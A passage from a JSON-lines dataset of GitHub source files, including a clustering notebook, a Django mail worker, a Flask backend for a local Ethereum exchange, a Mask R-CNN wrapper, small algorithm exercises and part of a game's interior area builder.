DBSCAN(eps=0.6, min_samples=12)\ndbscan2.fit(scaler1_df)\n\ny=pd.DataFrame(dbscan2.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[77]:\n\n\n# for epsilon = 0.5\ndbscan3 = DBSCAN(eps=0.5, min_samples=12)\ndbscan3.fit(scaler1_df)\n\n\n# In[78]:\n\n\ndbscan4 = DBSCAN(eps=0.55, min_samples=12)\ndbscan4.fit(scaler1_df)\n\ny=pd.DataFrame(dbscan4.fit_predict(scaler1_df),columns=['clusterid_DBSCAN'])\nprint(y['clusterid_DBSCAN'].value_counts())\n\n\n# In[79]:\n\n\n\n# silhouette score\nsil_score= silhouette_score(scaler1_df, dbscan4.labels_)\nprint('silhouette score: ',sil_score)\n\n\n# In[80]:\n\n\n# shows the noisy data points\ndata['clusterid_DBSCAN'] = dbscan4.labels_\ndata1['clusterid_DBSCAN'] = dbscan4.labels_\n\n\n# In[81]:\n\n\ndata.head()\n\n\n# In[83]:\n\n\n# Plotting barplot using groupby method to get visualization of how many row no. in each cluster\nfig, ax = plt.subplots(figsize=(10, 6))\ndata.groupby(['clusterid_DBSCAN']).count()['ID#'].plot(kind='bar')\nplt.ylabel('ID Counts')\nplt.title('Hierarchical Clustering',fontsize='large',fontweight='bold')\nax.set_xlabel('Clusters', fontsize='large', fontweight='bold')\nax.set_ylabel('ID counts', fontsize='large', fontweight='bold')\nplt.yticks(fontsize=15)\nplt.xticks(fontsize=15)\nplt.show()\n\n\n# In[84]:\n\n\ndata1.groupby('clusterid_DBSCAN').agg(['mean']).reset_index()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Nalinitak/Datasciencepython","sub_path":"Assinment 7 clustring airline dataset.py","file_name":"Assinment 7 clustring airline dataset.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25278557460","text":"import logging\n\nfrom django_gearman_commands import GearmanWorkerBaseCommand\n\nimport django_gearman_proxy.settings\nfrom django_gearman_proxy import load_object\n\n\nlog = logging.getLogger(__name__)\n\n\nUNSERIALIZER = load_object(django_gearman_proxy.settings.GEARMAN_EMAIL_UNSERIALIZER)\n\n\nclass Command(GearmanWorkerBaseCommand):\n\n @property\n def task_name(self):\n return 'send_mail'\n\n def do_job(self, job_data):\n to_return = False\n try:\n email_message = UNSERIALIZER(job_data)\n log.info('Sending mail message to \"%s\"', email_message.to)\n to_return = email_message.send()\n except Exception:\n log.exception('Error while sending mail message with data: %s', job_data)\n return to_return","repo_name":"char0n/django-gearman-proxy","sub_path":"django_gearman_proxy/management/commands/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"6347808800","text":"from flask import Flask, request\nfrom web3 import HTTPProvider, Web3\nimport json\nfrom flask import jsonify\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\n\ndef web3_get_account(account_addr):\n return get_web3().eth.account.privateKeyToAccount(priv_key(account_addr))\n\n\ndef name_by_account(w3_account):\n accounts = user_accounts()\n for acc in accounts.items():\n if acc[1][\"address\"] == w3_account.address:\n return acc[0]\n return None\n\n\ndef priv_key(account_addr):\n accounts = user_accounts()\n for acc in accounts.items():\n if acc[1][\"address\"] == account_addr:\n return acc[1][\"key\"]\n return None\n\n\ndef user_accounts():\n with open('config.json') as accounts_file:\n return json.load(accounts_file)\n\n\ndef get_web3():\n return Web3(Web3.HTTPProvider(\"http://localhost:8545\"))\n\n\ndef contract_info(contract_name):\n global contract_addresses\n with open(f\"contracts/{contract_name}/{contract_name}.abi\") as abi_file:\n abi = json.loads(abi_file.read())\n return contract_addresses[contract_name], abi\n\n\ndef user_balances(w3_account):\n eth_balance = dict()\n eth_balance['ticker'] = \"ETH\"\n eth_balance['balance'] = int(get_web3().eth.getBalance(w3_account.address)) / 1000000000000000000\n return [eth_balance]\n\n\ndef deploy(name_contract):\n w3 = Web3(HTTPProvider(\"http://127.0.0.1:8545\"))\n global wallet_addr\n global contract_addresses\n with open(f\"contracts/{name_contract}/{name_contract}.abi\") as abi_file:\n abi = json.loads(abi_file.read())\n with open(f\"contracts/{name_contract}/{name_contract}.bin\") as bin_file:\n bytecode = json.loads(bin_file.read())\n p_key = next(iter(user_accounts().values()))[\"key\"]\n w3.eth.account = w3.eth.account.privateKeyToAccount(p_key)\n current_contract = w3.eth.contract(abi=abi, bytecode=bytecode[\"object\"])\n transact_id = None\n if name_contract == \"Token\":\n transact_id = current_contract.constructor(1000, \"Token\", \"TKN\", 10, w3.eth.account.address).transact({'from': w3.eth.account.address})\n elif name_contract == \"Account\":\n transact_id = current_contract.constructor().transact({'from': w3.eth.account.address})\n elif name_contract == \"Engine\":\n transact_id = current_contract.constructor(wallet_addr).transact({'from': w3.eth.account.address})\n transact_receipt = w3.eth.waitForTransactionReceipt(transact_id)\n if transact_receipt['status']:\n print(f\"Contract {name_contract} deployed successfully at address: \" + transact_receipt['contractAddress'])\n contract_addresses[name_contract] = transact_receipt['contractAddress']\n if name_contract == \"Account\":\n wallet_addr = transact_receipt['contractAddress']\n\n\ncontract_addresses = {}\ntokens_db = {}\nwallet_addr = ''\ndeploy('Token')\ndeploy('Account')\ndeploy('Engine')\n\n\n@app.route('//account/profile_coins', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef coins_profile(account_address):\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n contract = w3.eth.contract(address=address, abi=abi)\n name = name_by_account(w3_account)\n message = 'Success'\n try:\n contract.functions.eth_balanceOf(w3_account.address).call({'from': w3_account.address}) / 1000000000000000000\n except Exception as e:\n message = e\n response = dict()\n response['address'] = account_address\n response['alias'] = name\n response['message'] = message\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/create_token', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef create_token(account_address):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n name = name_by_account(w3_account)\n contract = w3.eth.contract(address=address, abi=abi)\n if request.method == \"POST\":\n total_supply = request.json['tot']\n name = request.json['name']\n symbol = request.json['sym']\n decimals = request.json['dec']\n hash_transaction = contract.functions.createToken(w3_account.address, int(total_supply), name, symbol, int(decimals)).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n token_addr = contract.functions.getAddr().call({'from': w3_account.address})\n tokens_db[symbol] = token_addr\n response = dict()\n response['address'] = account_address\n response['alias'] = name\n return jsonify(response)\n\n\n@app.route('//account/eth_management/send_eth', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef send_ethereum(account_address):\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n name = name_by_account(w3_account)\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n if request.method == \"POST\":\n receiver = request.json['rec']\n amount = request.json['amo']\n try:\n hash_transaction = contract.functions.send_eth(w3_account.address, receiver, int(float(amount) * 1000000000000000000)).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n except Exception as e:\n message = e\n response = dict()\n response['address'] = account_address\n response['alias'] = name\n response['message'] = message\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/available_coins', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef coins_available(account_address):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n contract = w3.eth.contract(address=address, abi=abi)\n name = name_by_account(w3_account)\n tickers = list()\n balances = []\n for sym, tok_address in tokens_db.items():\n token_balance = contract.functions.token_balanceOf(w3_account.address, tok_address).call({'from': w3_account.address})\n balances.append(token_balance)\n coin = dict()\n coin['ticker'] = sym\n coin['address'] = tok_address\n coin['balance'] = token_balance\n tickers.append(coin)\n response = dict()\n response['address'] = account_address\n response['tickers'] = tickers\n response['alias'] = name\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/view_dom/', methods=['GET'])\n@cross_origin(supports_credentials=True)\ndef get_dom(account_address, token):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Engine\")\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n token_addr = tokens_db[token]\n buy_ord = contract.functions.getBuyOrders(token_addr).call({'from': w3_account.address})\n sell_ord = contract.functions.getSellOrders(token_addr).call({'from': w3_account.address})\n name = name_by_account(w3_account)\n response = dict()\n response['address'] = account_address\n response['message'] = message\n response['token'] = token\n response['alias'] = name\n response['buyOrders'] = buy_ord\n response['sellOrders'] = sell_ord\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/remove_order/', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef remove_order(account_address, token):\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Engine\")\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n if request.method == 'POST':\n global tokens_db\n token_addr = tokens_db[token]\n sell_order = request.json['sell']\n sell_order = True if sell_order == \"sell\" else False\n price = request.json['pri']\n hash_transaction = contract.functions.removeOrder(w3_account.address, token_addr, sell_order, int(price) * 1000000000000000000).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n name = name_by_account(w3_account)\n response = dict()\n response['address'] = account_address\n response['message'] = message\n response['token'] = token\n response['alias'] = name\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/send_token', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef token_snd(account_address):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n if request.method == \"POST\":\n receiver = request.json['rec']\n amount = request.json['amo']\n token_addr = tokens_db[request.json['tic']]\n hash_transaction = contract.functions.send_token(w3_account.address, receiver, token_addr, int(amount)).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n name = name_by_account(w3_account)\n response = dict()\n response['address'] = account_address\n response['message'] = message\n response['alias'] = name\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/sell_token/', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef token_sell(account_address, token):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Engine\")\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n if request.method == \"POST\":\n price = request.json['pri']\n amount = request.json['amo']\n token_addr = tokens_db[token]\n hash_transaction = contract.functions.sellOffer(w3_account.address, token_addr, int(float(price) * 1000000000000000000), int(amount)).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n name = name_by_account(w3_account)\n response = dict()\n response['address'] = account_address\n response['message'] = message\n response['alias'] = name\n response['token'] = token\n return jsonify(response)\n\n\n@app.route('//account/profile_coins/buy_token/', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef wallet_buy_token(account_address, token):\n global tokens_db\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Engine\")\n contract = w3.eth.contract(address=address, abi=abi)\n message = ''\n if request.method == \"POST\":\n price = request.json['pri']\n amount = request.json['amo']\n token_addr = tokens_db[token]\n hash_transaction = contract.functions.buyOffer(w3_account.address, token_addr, int(float(price) * 1000000000000000000), int(amount)).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n name = name_by_account(w3_account)\n response = dict()\n response['address'] = account_address\n response['message'] = message\n response['alias'] = name\n response['token'] = token\n return jsonify(response)\n\n\n@app.route('/check_pass', methods=['POST'])\n@cross_origin(supports_credentials=True)\ndef check_pass():\n address = request.json['address']\n password = request.json['key']\n found = False\n db = user_accounts()\n for user in db:\n if db[user][\"address\"] == address and db[user][\"key\"] == password:\n found = True\n response = dict()\n response['status'] = found\n return jsonify(response)\n\n\n@app.route('/')\n@cross_origin(supports_credentials=True)\ndef get_specific_account(account_address):\n w3_account = web3_get_account(account_address)\n name = name_by_account(w3_account)\n balances = user_balances(w3_account)\n response = dict()\n response['address'] = w3_account.address\n response['balances'] = balances\n response['alias'] = name\n return jsonify(response)\n\n\n@app.route('//account')\n@cross_origin(supports_credentials=True)\ndef account_wall(account_address):\n w3_account = web3_get_account(account_address)\n name = name_by_account(w3_account)\n response = dict()\n response['alias'] = name\n response['address'] = w3_account.address\n return response\n\n\n@app.route('//account/create_wallet')\n@cross_origin(supports_credentials=True)\ndef new_wallet(account_address):\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n name = name_by_account(w3_account)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n contract = w3.eth.contract(address=address, abi=abi)\n hash_transaction = contract.functions.create_wallet(w3_account.address).transact({'from': w3_account.address})\n tx_receipt = w3.eth.waitForTransactionReceipt(hash_transaction)\n if tx_receipt['status']:\n message = 'Wallet is created!'\n else:\n message = \"Fail\"\n response = dict()\n response['address'] = account_address\n response['alias'] = name\n response['message'] = message\n return jsonify(response)\n\n\n@app.route('//account/eth_management', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\ndef wallet_profile(account_address):\n w3 = get_web3()\n w3_account = web3_get_account(account_address)\n w3.eth.defaultAccount = w3_account\n address, abi = contract_info(\"Account\")\n name = name_by_account(w3_account)\n contract = w3.eth.contract(address=address, abi=abi)\n try:\n eth_balance = contract.functions.eth_balanceOf(w3_account.address).call({'from': w3_account.address}) / 1000000000000000000\n message = ''\n if request.method == \"POST\":\n if request.json['dep'] != '':\n eth = request.json['dep']\n elif request.json['with'] != '':\n eth = request.json['with']\n else:\n eth = 0\n value = w3.toWei(float(eth), 'ether')\n if request.json['dep'] != '':\n hash_transaction = contract.functions.deposit_eth(w3_account.address).transact({'from': w3_account.address, 'value': value})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n elif request.json['with'] != '':\n try:\n hash_transaction = contract.functions.withdraw(w3_account.address, value).transact({'from': w3_account.address})\n w3.eth.waitForTransactionReceipt(hash_transaction)\n except Exception as e:\n message = e\n except Exception as e:\n eth_balance = 0\n message = e\n response = dict()\n response['balance'] = eth_balance\n response['address'] = account_address\n response['alias'] = name\n response['message'] = message\n return jsonify(response)\n\n\n@app.route('/')\n@cross_origin(supports_credentials=True)\ndef get_accounts():\n accounts = user_accounts()\n addresses = [acc[1][\"address\"] for acc in accounts.items()]\n names = [acc[0] for acc in accounts.items()]\n users = list()\n for i in range(0, len(names)):\n user = dict()\n user['id'] = i\n user['alias'] = names[i]\n user['address'] = addresses[i]\n users.append(user)\n return jsonify(users)\n","repo_name":"Louie-ru/DEX-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18834062498","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn.functional as F\n\nfrom torchvision.models.detection import MaskRCNN\nfrom torchvision.models.detection.backbone_utils import resnet_fpn_backbone\nfrom torchvision.models.detection.transform import resize_boxes\nfrom torchvision.models.detection import maskrcnn_resnet50_fpn\nimport pycocotools.mask as cocomask\nimport numpy as np\nimport pdb\nclass MRCNN_FPN():\n\n def __init__(self):\n self.model = maskrcnn_resnet50_fpn(pretrained=True)\n self.model.original_image_sizes = None\n self.model.preprocessed_images = None\n self.model.features = None\n\n def predict_masks(self, boxes, images):\n\n device = list(self.model.parameters())[0].device\n boxes = boxes.to(device)\n images = images.to(device)\n\n self.model.original_image_sizes = [img.shape[-2:] for img in images]\n\n preprocessed_images, _ = self.model.transform(images, None)\n self.model.preprocessed_images = preprocessed_images\n\n self.model.features = self.model.backbone(preprocessed_images.tensors)\n if isinstance(self.model.features, torch.Tensor):\n self.model.features = OrderedDict([(0, self.model.features)])\n\n boxes_new = resize_boxes(boxes, self.model.original_image_sizes[0], self.model.preprocessed_images.image_sizes[0])\n proposals = [boxes_new]\n\n mask_features = self.model.roi_heads.mask_roi_pool(self.model.features, proposals, self.model.preprocessed_images.image_sizes)\n\n pred_mask_heads = self.model.roi_heads.mask_head(mask_features)\n pred_masks = self.model.roi_heads.mask_predictor(pred_mask_heads)\n\n preds=[{\"boxes\": boxes_new, \"masks\": pred_masks[:,1:2], \"labels\": torch.tensor([1 for k in pred_masks]),\"scores\": torch.tensor([1. for k in pred_masks])}]\n preds_new= self.model.transform.postprocess(preds, self.model.preprocessed_images.image_sizes, self.model.original_image_sizes)\n pred_masks=preds_new[0][\"masks\"].squeeze(1).permute(1,2,0).detach().cpu().numpy()>0.5\n return cocomask.encode(np.asfortranarray(pred_masks.astype(np.uint8)))\n","repo_name":"AnwesaChoudhuri/AssignmentSpace-MOTS","sub_path":"assignmentspace_mots/utils/mrcnn_fpn.py","file_name":"mrcnn_fpn.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"1784611156","text":"#coding=utf-8\n\nimport random\n\ndef bucket_sort(lst):\n \n buckets = [[] for i in range(10)]\n\n for idx, item in enumerate(lst): \n buckets[item].append(item)\n\n return [i for l in buckets for i in l]\n\n\n\nlst = list(range(10)) * 5\nrandom.shuffle(lst)\n\nlst = random.sample(lst, 10)\n\nprint(lst)\nprint(bucket_sort(lst))\n","repo_name":"Provinm/baseCs","sub_path":"Books/Algorithms/Part-1/Chapter-8/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5781324483","text":"from typing import Union, List\nimport numpy as np\nimport auto_diff as ad\n\n\nclass Model(ad.layers.Layer):\n\n def __init__(self,\n inputs: Union[ad.layers.Input, List[ad.layers.Input]],\n outputs: Union[ad.layers.Layer, List[ad.layers.Layer]],\n **kwargs):\n super(Model, self).__init__(**kwargs)\n self._inputs = inputs\n self._outputs = outputs\n self._optimizer = None\n self._losses = None\n self._loss = None\n self._layers = None\n self._updates = []\n self._output_placeholders = None\n self._session = ad.sess.Session()\n\n def compute_output_shape(self, input_shape):\n if isinstance(self._outputs, list):\n return [output.output_shapes for output in self._outputs]\n return self._outputs.output_shapes\n\n def build(self, optimizer: ad.optims.Optimizer, losses):\n if not self._built:\n self._optimizer = optimizer\n self._losses = losses\n self._layers = {}\n\n def _collect_all_layers(layer):\n if layer is None:\n return\n if layer in self._layers:\n return\n self._layers[layer] = layer\n if isinstance(layer.inputs, list):\n for input_layer in layer.inputs:\n _collect_all_layers(input_layer)\n else:\n _collect_all_layers(layer.inputs)\n\n if isinstance(self.outputs, list):\n for output in self.outputs:\n _collect_all_layers(output)\n else:\n _collect_all_layers(self.outputs)\n\n for layer in self._layers.values():\n self._trainable_weights += layer.trainable_weights\n self._non_trainable_weights += layer.non_trainable_weights\n self._updates += layer.updates\n\n self._loss = 0.0\n if isinstance(self.outputs, list):\n self._output_placeholders = []\n for i, output in enumerate(self.outputs):\n output_shapes = output.output_shapes\n if isinstance(output_shapes, list):\n self._output_placeholders.append([])\n for j, output_shape in enumerate(output_shapes):\n output_placeholder = ad.OpPlaceholder(output_shape)\n self._output_placeholders[-1].append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs[i].outputs[j])\n else:\n output_placeholder = ad.OpPlaceholder(output_shapes)\n self._output_placeholders.append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs[i].outputs)\n else:\n output_shapes = self.outputs.output_shapes\n if isinstance(output_shapes, list):\n self._output_placeholders = []\n for i, output_shape in enumerate(output_shapes):\n output_placeholder = ad.OpPlaceholder(output_shapes)\n self._output_placeholders.append(output_placeholder)\n self._loss = self._loss + losses(output_placeholder, self.outputs.outputs[i])\n else:\n output_placeholder = ad.OpPlaceholder(output_shapes)\n self._output_placeholders = output_placeholder\n self._loss = self._loss + losses(output_placeholder, self.outputs.outputs)\n\n super(Model, self).build(None)\n\n def call(self, inputs, **kwargs):\n return self.outputs\n\n def fit_on_batch(self,\n x: Union[np.ndarray, List[np.ndarray]],\n y: Union[np.ndarray, List[np.ndarray]]):\n # TODO: Multiple outputs\n feed_dict = {ad.Operation.KEY_TRAINING: True}\n if isinstance(x, list):\n for i, input_val in enumerate(x):\n feed_dict[self._inputs[i].placeholder] = input_val\n else:\n feed_dict[self._inputs.placeholder] = x\n feed_dict[self._output_placeholders] = y\n self._session.prepare()\n self._session.run(self._loss, feed_dict=feed_dict)\n self._loss.backward()\n for var, update in self.updates:\n var.update(update.forward(feed_dict=feed_dict))\n self._optimizer.update(self.trainable_weights, self._session)\n\n def predict_on_batch(self, x: Union[np.ndarray, List[np.ndarray]]) -> Union[np.ndarray, List[np.ndarray]]:\n feed_dict = {ad.Operation.KEY_TRAINING: False}\n if isinstance(x, list):\n for i, input_val in enumerate(x):\n feed_dict[self._inputs[i].placeholder] = input_val\n else:\n feed_dict[self._inputs.placeholder] = x\n self._session.prepare()\n if isinstance(self._outputs, list):\n outputs = [self._session.run(output.outputs, feed_dict=feed_dict) for output in self._outputs]\n else:\n outputs = self._session.run(self._outputs.outputs, feed_dict=feed_dict)\n return outputs\n","repo_name":"CyberZHG/toy-auto-diff","sub_path":"auto_diff/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"25086720019","text":"import numpy as np\nimport itertools\nfrom heapq import heappush, heappop\nfrom collections import defaultdict\n\nclass Vert:\n def __init__(self, pos, next=None, parent=None):\n self.pos = np.array(pos).copy()\n self.next = next\n self.parent = parent\n self.support = None\n\n def __eq__(self, other):\n if type(other) is tuple:\n return tuple(self.pos) == other\n else:\n return tuple(self.pos) == tuple(other.pos)\n\n def __hash__(self):\n return hash(tuple(self.pos))\n\n\nclass DNDict:\n '''Default dictionary with support for np.ndarray->tuple key conversion\n '''\n def __init__(self, default_func, insert_after_missing=False):\n self._missing = default_func\n self._dict = {}\n self.insert_after_missing = insert_after_missing\n\n def __delitem__(self, key):\n if type(key) is np.ndarray:\n key = tuple(key)\n if key in self._dict:\n del self._dict[key]\n\n def __getitem__(self, key):\n if type(key) is np.ndarray:\n key = tuple(key)\n if key in self._dict:\n return self._dict[key]\n else:\n ret = self._missing(key)\n if self.insert_after_missing:\n self[key] = ret\n return ret\n\n def __setitem__(self, key, obj):\n if type(key) is np.ndarray:\n key = tuple(key)\n self._dict[key] = obj\n\n\n# mostly from https://docs.python.org/2/library/heapq.html\nclass PQ:\n def __init__(self):\n self.pq = [] # list of entries arranged in a heap\n self.entry_finder = {} # mapping of vertexs to entries\n self.REMOVED = '' # placeholder for a removed vertex\n self.counter = itertools.count() # unique sequence count\n\n def __contains__(self, obj):\n if type(obj) is np.ndarray: obj = tuple(obj)\n return obj in self.entry_finder\n\n def top_key(self):\n while self.pq:\n if self.pq[0][-1] is self.REMOVED:\n heappop(self.pq)\n else:\n return self.pq[0][0]\n\n def push(self, obj, priority):\n 'Add a new vertex or update the priority of an existing vertex'\n if type(obj) is np.ndarray: obj = tuple(obj)\n if obj in self.entry_finder:\n self.remove(obj)\n count = next(self.counter)\n entry = [priority, count, obj]\n self.entry_finder[obj] = entry\n heappush(self.pq, entry)\n\n def remove(self, obj):\n 'Mark an existing vertex as REMOVED. Raise KeyError if not found.'\n if type(obj) is np.ndarray: obj = tuple(obj)\n entry = self.entry_finder.pop(obj)\n entry[-1] = self.REMOVED\n\n def pop(self):\n 'Remove and return the lowest priority vertex. Raise KeyError if empty.'\n while self.pq:\n priority, count, vertex = heappop(self.pq)\n if vertex is not self.REMOVED:\n del self.entry_finder[vertex]\n return vertex\n raise KeyError('pop from an empty priority queue')\n\n def __iter__(self):\n while self.top_key() is not None:\n yield self.pop()\n","repo_name":"arl-o/MPGAA-implementation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23668415010","text":"class Solution:\n def majorityElement(self, nums):\n\n nums.sort()\n\n return nums[len(nums)//2]\n\n def majorityElement2(self, nums):\n\n count = 0\n element = 0\n\n for num in nums:\n if count == 0:\n element = num\n\n if num == element:\n count += 1\n else:\n count -= 1\n\n return element\n\n def majorityElement3(self, nums):\n\n return max(set(nums), key=nums.count)\n\ns = Solution()\n\nprint(s.majorityElement2([2,2,1,1,1,2,2]))\n","repo_name":"EashanKaushik/LeetCode","sub_path":"30-Day-Challange/Day-3-Array/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4246956459","text":"def is_prime(n):\n if n < 2:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True\n\ndef nth_prime(n):\n prime_count = 0\n i = 2\n while True:\n if is_prime(i):\n prime_count += 1\n if prime_count == n:\n return i\n i += 1\n\nn = int(input(\"Enter the value of N: \"))\nnth_prime_number = nth_prime(n)\nprint(f\"The {n}th prime number is {nth_prime_number}\")\nprint(\"The next 5 integers are:\")\nfor i in range(1, 6):\n print(nth_prime_number + i)\n\n\n\n#grepper python lambda function\n#Description: A lambda function is a small, anonymous function defined using the lambda keyword. It can take any number of arguments but can only have one expression.\n#Example: square = lambda x: x * x\n#end grepper","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"LeetCode/nthPrime+5integers.py","file_name":"nthPrime+5integers.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40715039153","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\n\nfrom pirates.world.GameAreaBuilderAI import GameAreaBuilderAI\nfrom pirates.leveleditor import ObjectList\nfrom pirates.leveleditor import WorldDataGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.world.DistributedCellDoorAI import DistributedCellDoorAI\nfrom pirates.minigame.DistributedPokerTableAI import DistributedPokerTableAI\nfrom pirates.minigame.DistributedHoldemTableAI import DistributedHoldemTableAI\nfrom pirates.minigame.DistributedBlackjackTableAI import DistributedBlackjackTableAI\nfrom pirates.minigame.Distributed7StudTableAI import Distributed7StudTableAI\nfrom pirates.minigame.DistributedBishopsHandTableAI import DistributedBishopsHandTableAI\nfrom pirates.minigame.DistributedLiarsDiceAI import DistributedLiarsDiceAI\n\n\nclass InteriorAreaBuilderAI(GameAreaBuilderAI):\n notify = directNotify.newCategory('InteriorAreaBuilderAI')\n\n def __init__(self, air, parent):\n GameAreaBuilderAI.__init__(self, air, parent)\n\n self.wantJailCellDoors = config.GetBool('want-jail-cell-doors', True)\n self.wantParlorGames = config.GetBool('want-parlor-games', True)\n\n def createObject(self, objType, objectData, parent, parentUid, objKey, dynamic, parentIsObj=False, fileName=None, actualParentObj=None):\n newObj = None\n if objType == ObjectList.DOOR_LOCATOR_NODE and self.wantDoorLocatorNodes:\n newObj = self.createDoorLocatorNode(parent, parentUid, objKey, objectData)\n elif objType == ObjectList.LOCATOR_NODE and self.wantConnectorLocatorNodes:\n newObj = self.createConnectorLocatorNode(parent, parentUid, objKey, objectData)\n elif objType == 'Jail Cell Door' and self.wantJailCellDoors:\n newObj = self.createCellDoor(parent, parentUid, objKey, objectData)\n elif objType == 'Parlor Game' and self.wantParlorGames:\n newObj = self.createParlorTable(objectData, parent, parentUid, objKey)\n else:\n newObj = GameAreaBuilderAI.createObject(self, objType, objectData, parent, parentUid,\n objKey, dynamic, parentIsObj, fileName, actualParentObj)\n\n return newObj\n\n def createDoorLocatorNode(self, parent, parentUid, objKey, objectData):\n from pirates.world.DistributedInteriorDoorAI import DistributedInteriorDoorAI\n\n doorLocatorNode = DistributedInteriorDoorAI(self.air)\n doorLocatorNode.setUniqueId(objKey)\n doorLocatorNode.setPos(objectData.get('Pos', (0, 0, 0)))\n doorLocatorNode.setHpr(objectData.get('Hpr', (0, 0, 0)))\n doorLocatorNode.setScale(objectData.get('Scale', (1, 1, 1)))\n doorLocatorNode.setInteriorId(self.parent.doId, self.parent.parentId, self.parent.zoneId)\n\n if not self.parent.getInteriorFrontDoor():\n self.parent.setInteriorFrontDoor(doorLocatorNode)\n exteriorDoor = self.parent.getExteriorFrontDoor()\n else:\n doorLocatorNode.setDoorIndex(1)\n self.parent.setInteriorBackDoor(doorLocatorNode)\n exteriorDoor = self.parent.getExteriorBackDoor()\n\n if not exteriorDoor:\n self.notify.debug('Cannot generate interior door %s, '\n 'cant find other exterior door!' % objKey)\n\n return\n\n exteriorWorld = self.parent.getParentObj()\n if not exteriorWorld:\n self.notify.debug('Cannot create interior door %s, '\n 'for exterior with no parent!' % objKey)\n\n return\n\n exterior = exteriorDoor.getParentObj()\n if not exterior:\n self.notify.debug('Cannot create interior door %s, '\n 'no exterior found!' % objKey)\n\n return\n\n doorLocatorNode.setBuildingUid(exteriorDoor.getBuildingUid())\n doorLocatorNode.setOtherDoor(exteriorDoor)\n doorLocatorNode.setExteriorId(exterior.doId, 